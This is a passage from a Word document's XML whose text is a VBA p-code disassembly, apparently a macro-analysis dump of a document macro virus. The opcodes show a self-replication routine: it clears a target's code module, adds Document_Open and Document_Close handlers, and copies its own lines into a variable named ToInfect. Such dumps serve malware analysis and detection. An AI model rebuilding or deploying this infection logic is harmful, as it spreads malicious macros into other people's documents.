        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CFA06" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #56:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390B443" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51604063" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #57:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492EBD4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x001C "Private Sub Document_Close()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E2A5D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745BFF7C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08651FC0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7FCB37" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall AddFromString 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3B4E2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #58:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EE28C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525E149" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794091D8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2813FD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593A8F3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC55C86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B703F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E0C7B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081C497" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #59:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5FC313" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB913D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F82C4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D985620" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CB097" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557F55B7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108248D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EEB40" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43A84E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall InsertLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C78B3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF5175" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3574B498" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594102CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15A601" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E2FEF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #61:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1A6CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F93BDF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #62:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017AD0B4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA53213" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #63:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7EF4F1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld DoAD </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487B864" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B98AF4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A147614" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E02A306" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634FB25" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39936560" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A4F0C9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B631D9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A34213" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2AB07D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1803B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24612297" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78B573" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #65:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5D843" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D67A39" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371BCE86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CEC126" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall DeleteLines 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D499CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #66:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D6D39" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3E113" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #67:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E66AC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x001B "Private Sub Document_Open()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5285CD58" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72238248" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749F1C6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD2F3E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall AddFromString 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A3018" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #68:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233E901" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E8E80" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D94C0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B068D5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2A07A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC32DC7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C013BF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C241CE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">DoWhile </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E635740" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #69:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34170845" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5069F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBED82" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED375DC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld NTI1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D4666" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026289DB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Lines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F3F06" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ToInfect </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10317FF5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd CodeModule </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56069C04" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall InsertLines 0x0002 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C2044" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #70:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8EB03D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BDE58" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D82B3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BF7BB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">St BGN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300B7E4D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #71:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F920BF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Loop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A11E2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #72:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3CE46A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A13A420" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #73:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C55DC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Label CYA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6CB0A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #74:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D680A9D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
